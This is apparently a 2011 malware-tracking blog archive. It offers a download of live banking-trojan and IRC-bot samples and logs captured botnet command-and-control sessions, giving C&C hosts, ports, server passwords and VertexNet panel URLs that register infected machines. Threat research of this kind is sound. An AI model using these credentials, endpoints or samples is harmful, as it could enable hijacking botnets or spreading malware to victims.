Month: December 2011

Hello everyone i wish u all the best and happy new year 2012 Gezuar vitin e ri 2012 te gjithe atyre qe kane lindur shqiptare e qe shkruajne e flasin gjuhen me te bukur ne bote SHQIPEN

today i found this email in my spams de admin@uniquefraud.org via sec5127.2×4.ru à my email date 30 décembre 2011 22:52 objet News UniqueFraud envoyé par sec5127.2×4.ru masquer les détails 22:52 (Il y a 19 heures) Letze Chance 2011 Wer möchte Sie nutzen? Komme vorbei und mach dir einen Account Wir freuen uns Die Registrierung istRead more...

This is another package with malware samples collected during my free time Inside u have alot of banking trojan samples,ngrBot samples,mirc bots samples etc have fun exploring Download

Remote Host Port Number 208.67.252.2 2345 NICK New[USA|00|P|29713] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-2551 * 0 :COMPUTERNAME MODE New[USA|00|P|29713] -ix JOIN #!loco! PONG 22 MOTD hosting infos: http://whois.domaintools.com/208.67.252.2

Resolved : [irc.amet12.cjb.net] To [200.48.201.149] 200.48.201.149 4244 PASS google_cache2.tmp NICK new[iRooT-XP-USA]861309 USER 8613 “” “TsGh” :8613 JOIN #!N!# WTF PRIVMSG #!N!# :http://kajmak1.bloger.hr Has Been Visited! exe file: Download hosting infos: http://whois.domaintools.com/200.48.201.149

Resolved : [mw8.no-ip.info] To [217.23.4.65] Remote Host Port Number 217.23.4.65 6667 PASS google_cache2.tmp NICK new[iRooT-XP-USA]392156 USER 4337 “” “TsGh” :4337 JOIN #Bawse PONG :irc.priv8net.com hosting infos: http://whois.domaintools.com/217.23.4.65

blackicejoker.no-ip.biz 193.107.17.47 Download URLs http://193.107.17.47/VertexNet/tasks.php?uid={46774bc0-fe5b-11d5-9480-806d6172696f-1394498804} (blackicejoker.no-ip.biz) http://193.107.17.47/VertexNet/adduser.php?uid={46774bc0-fe5b-11d5-9480-806d6172696f-1394498804}&lan=10.1.8.2&cmpname=DELL-D3E62F7E26%20[Administrator]&country=Deutsch%20(Deutschland)%20+49&cc=DE&idle=9376&ver=v1.2 (blackicejoker.no-ip.biz) hosting infos: http://whois.domaintools.com/193.107.17.47

Remote Host Port Number 193.107.16.114 1863 PASS ngrBot 199.15.234.7 80 65.110.60.20 80 NICK n{US|XPa}tuoheyk USER tuoheyk 0 0 :tuoheyk JOIN #rjr RjR PRIVMSG #rjr :[DNS]: Blocked 0 domain(s) – Redirected 4 domain(s) hosting infos: http://whois.domaintools.com/193.107.16.114

Resolved : [jayian.com] To [76.191.112.53] Remote Host Port Number 76.191.112.53 1866 NICK n[USA|XP|COMPUTERNAME]qfilxzg USER hh “” “lol” :hh JOIN #!h! PONG 422 Now talking in #!h! Topic On: [ #!h! ] [ ] Topic By: [ xx ] UPDATE: Remote Host Port Number 199.15.234.7 80 69.163.148.162 80 76.191.112.53 2087 PASS carmex PRIVMSG #!s! :[DNS]: BlockedRead more...

My estimation for this botnet size is 30-50k aproximatly Domains used to control bots: xxlaa.com active Sabukenke.com not active Alufina.com not activ xxlss.com not active xxlcc.com not active Resolved : [xxlaa.com] To [31.186.102.170] C&C Server: 222.187.221.243:7777 PASS laekin0505x Server Password: Username: ynuvlog Nickname: n{DE|XPa}ynuvlog Channel: (Password: ) Channeltopic: C&C Server: 31.186.102.170:7777 PASS laekin0505x Server Password:Read more...